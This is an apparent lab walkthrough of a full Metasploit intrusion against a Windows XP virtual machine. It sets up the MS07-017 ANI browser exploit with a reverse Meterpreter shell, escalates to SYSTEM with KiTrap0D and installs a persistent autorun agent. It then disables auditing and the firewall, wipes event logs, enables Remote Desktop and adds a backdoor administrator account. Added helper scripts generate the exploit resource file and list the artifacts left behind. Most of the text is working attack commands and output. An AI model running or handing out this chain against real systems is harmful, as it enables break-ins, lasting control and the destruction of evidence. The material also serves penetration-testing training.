Target Host: 192.168.1.50 (LON-CL1, Windows XP SP2) on 192.168.1.0/24
Attacking Host: 192.168.1.252 (BackTrack, root@bt)
Step 1: Create a resource file in the /sources directory
root@bt:~# nano /sources/ie_ani
Enter the following as the contents of the ie_ani file. A resource file is simply a list of msfconsole commands that are executed in order. The module is the MS07-017 ANI cursor overflow (CVE-2007-0038), so the target must be missing that patch. SRVHOST/SRVPORT is where the exploit's web server listens and LHOST/LPORT is where the reverse Meterpreter handler listens; both run on the attacking host, so the two ports must differ.
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.252
set SRVPORT 80
set LHOST 192.168.1.252
set LPORT 443
set URIPATH /you_win
exploit
Press Ctrl-X and Y, then press Enter to save the file.
Step 2: Launch Metasploit from its working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /sources/ie_ani
resource (/sources/ie_ani)> use windows/browser/ms07_017_ani_loadimage_chunksize
resource (/sources/ie_ani)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/sources/ie_ani)> set SRVHOST 192.168.1.252
SRVHOST => 192.168.1.252
resource (/sources/ie_ani)> set SRVPORT 80
SRVPORT => 80
resource (/sources/ie_ani)> set LHOST 192.168.1.252
LHOST => 192.168.1.252
resource (/sources/ie_ani)> set LPORT 443
LPORT => 443
resource (/sources/ie_ani)> set URIPATH /you_win
URIPATH => /you_win
resource (/sources/ie_ani)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.252:443
[*] Using URL: http://192.168.1.252:80/you_win
[*] Server started.
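Steps 1 and 2 can be wrapped in a small shell helper that writes the resource file from parameters and refuses the two mistakes that make the setup fail quietly: giving the web server and the handler the same socket, and using privileged ports without root. This is an added example, not code from the original write-up or from Metasploit; the function name make_ani_rc and the output path are assumptions.

```shell
#!/bin/sh
# Added example: write the Step 1 resource file from parameters and refuse the
# combinations that make Step 2 fail quietly. Not part of the original
# write-up or of Metasploit; function name and paths are assumptions.

# make_ani_rc OUTFILE SRVHOST SRVPORT LHOST LPORT URIPATH
# Writes a resource file equivalent to /sources/ie_ani. Returns 1 and writes
# nothing if the parameters are inconsistent.
make_ani_rc() {
    out=$1 srvhost=$2 srvport=$3 lhost=$4 lport=$5 uripath=$6

    case "$srvport$lport" in
        ''|*[!0-9]*) echo "make_ani_rc: ports must be numeric" >&2; return 1 ;;
    esac
    # The exploit's web server binds SRVHOST:SRVPORT and the reverse handler
    # binds LHOST:LPORT; both run inside the same msfconsole, so on one
    # address they need two different ports.
    if [ "$srvhost" = "$lhost" ] && [ "$srvport" -eq "$lport" ]; then
        echo "make_ani_rc: SRVPORT and LPORT must differ on the same address" >&2
        return 1
    fi
    # Ports below 1024 (80 and 443 in the write-up) need root on Linux.
    if [ "$(id -u)" -ne 0 ] && { [ "$srvport" -lt 1024 ] || [ "$lport" -lt 1024 ]; }; then
        echo "make_ani_rc: ports below 1024 require root" >&2
        return 1
    fi
    # Normalise URIPATH so the URL handed to the target is unambiguous.
    case "$uripath" in /*) ;; *) uripath="/$uripath" ;; esac

    cat > "$out" <<EOF
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST $srvhost
set SRVPORT $srvport
set LHOST $lhost
set LPORT $lport
set URIPATH $uripath
exploit
EOF
    echo "wrote $out; target URL is http://$srvhost:$srvport$uripath"
}

# Usage (matches Steps 1 and 2 of the write-up):
#   make_ani_rc /sources/ie_ani 192.168.1.252 80 192.168.1.252 443 /you_win
#   cd /pentest/exploits/framework3 && ./msfconsole -r /sources/ie_ani
```

The helper only writes the file; launching msfconsole with -r is still done by hand as in Step 2, so a rejected parameter set never leaves a half-configured exploit running.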
Step 3: Launch Internet Explorer (IE) on the target machine
Type the following in the address bar:
http://192.168.1.252/you_win
Switch back to the attacking machine and check whether the connection from the target has arrived. Once it has, you can interact with Meterpreter.
msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.50:1162...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.50:1162...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1163) at Wed Sep 29 12:08:22 +0800 2010
Press Enter to get the prompt back, then list the open sessions.
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\testuser @ LON-CL1 192.168.1.252:443 -> 192.168.1.50:1163
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0
Check our privilege level
meterpreter > getuid
Server username: LON-CL1\testuser
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[-] core_channel_open: Operation failed: 5
The upload fails with Windows error 5 (ERROR_ACCESS_DENIED): testuser cannot write to System32. Escalate our privileges with the KiTrap0D local kernel exploit (MS10-015, CVE-2010-0232), which only works on a 32-bit target that is missing that patch.
meterpreter > run kitrap0d
[*] Currently running as LON-CL1\testuser
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\LnZbxqeuZgMB.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1316)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x285ee bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 180
[?] OpenProcess(180) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[*] uploaded : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt
Maintain access by uploading a Meterpreter agent. In this Metasploit version the -h output of the persistence script is cut short and ends in a script error; the options used below are -A (start a matching multi/handler automatically), -X (start the agent at boot, which needs the HKLM write we now have as SYSTEM), -p (handler port) and -r (handler IP).
meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i
-p
-r
[-] Error in script: LocalJumpError unexpected return
meterpreter > run persistence -A -X -p 443 -r 192.168.1.252
[*] Creating a persistent agent: LHOST=192.168.1.252 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613927 bytes long
[*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs
[*] Agent executed with PID 1732
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc
Exit the Meterpreter session.
meterpreter > exit
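Every step in this section leaves something on the target, and the cleanup .rc files that persistence and getgui print only revert what those scripts themselves installed. The following added example (not part of the original write-up or of Metasploit) pulls the dropped files, autorun entries, cleanup commands and created accounts out of a saved msfconsole transcript, such as one written with the spool command, so nothing is forgotten at the end of the engagement. The sample log embedded in the script is constructed from the console lines shown on this page, including the getgui and net user lines that appear in the Remote Desktop section; the function names and the kind|value output format are assumptions.

```shell
#!/bin/sh
# Added example: pull the artifacts an engagement left on the target out of a
# saved msfconsole transcript (e.g. "spool /root/lon-cl1.log" in msfconsole).
# Not part of the original write-up or of Metasploit; function names and the
# "kind|value" output format are assumptions.

# write_sample_log FILE: constructed sample, copied from the console output
# shown in this write-up; it stands in for a real spool file so the script
# runs offline.
write_sample_log() {
    cat > "$1" <<'EOF'
[*] uploaded : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt
[*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs
[*] Agent executed with PID 1732
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc
C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add
net localgroup administrators hacker /add
EOF
}

# list_artifacts FILE: one "kind|value" line per artifact, duplicates removed.
#   file        a file written to the target (upload, persistence agent)
#   reg         an autorun registry value the persistence script created
#   cleanup_rc  a cleanup resource file Metasploit wrote on the attacker box
#   account     a local account created with "net user ... /add"
#   group       a group membership added with "net localgroup ... /add"
# The shell echoes each typed command, so prompt and echo lines both match
# and sort -u collapses them.
list_artifacts() {
    sed -n \
        -e 's#^\[\*\] uploaded *: .* -> \(.*\)$#file|\1#p' \
        -e 's#^\[\*\] Uploaded the persistent agent to \(.*\)$#file|\1#p' \
        -e 's#^\[\*\] Installed into autorun as \(.*\)$#reg|\1#p' \
        -e 's#^\[\*\] For cleanup use command: run multi_console_command -rc \(.*\)$#cleanup_rc|\1#p' \
        -e 's#^.*net user \([^ ][^ ]*\) [^ ][^ ]* /add *$#account|\1#p' \
        -e 's#^.*net localgroup \([^ ][^ ]*\) \([^ ][^ ]*\) /add *$#group|\1:\2#p' \
        "$1" | sort -u
}

# Demo on the constructed sample.
tmp=$(mktemp)
write_sample_log "$tmp"
list_artifacts "$tmp"
rm -f "$tmp"
```

The two cleanup_rc entries are run from msfconsole with multi_console_command and remove the agent, its Run value and the RDP changes; the file and account entries (hacked.txt, the hacker account and its Administrators membership) are not covered by either script and have to be removed by hand.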
Step 4: Create a listener on our machine for the agent's callback. This is only needed when the handler started by -A is gone (for example after restarting msfconsole); it must use the same payload, LHOST and LPORT the agent was built with.
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.252
LHOST => 192.168.1.252
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.252:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1176) at Wed Sep 29 12:30:27 +0800 2010
Clearing tracks (housekeeping). Note that each of these changes (auditing off, firewall off, logs wiped) is itself a visible change on the target.
meterpreter > run disable_audit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies
OPTIONS:
-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.
meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Internal firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] External firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...
meterpreter > clearev
[*] Wiping 942 records from Application...
[*] Wiping 1984 records from System...
[*] Wiping 1 records from Security...
Clearing the Security log is itself audited: Windows XP writes event 517 ("The audit log was cleared") as the first record of the fresh Security log, so this step leaves its own trace.
Enabling and Accessing Remote Desktop
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc
meterpreter > shell
Process 820 created.
Channel 18 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.
C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\Documents and Settings\testuser\Desktop>^C
Terminate channel 18? [y/N] y
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0
meterpreter >
Remote Desktop Connection
Open a new terminal and run the rdesktop client to connect to the target machine, logging in with the hacker account created above (on XP Professional any member of Administrators may connect). Remote Desktop on XP allows only one interactive session, so connecting locks the console and is obvious to anyone sitting at LON-CL1.
root@bt:~# rdesktop 192.168.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16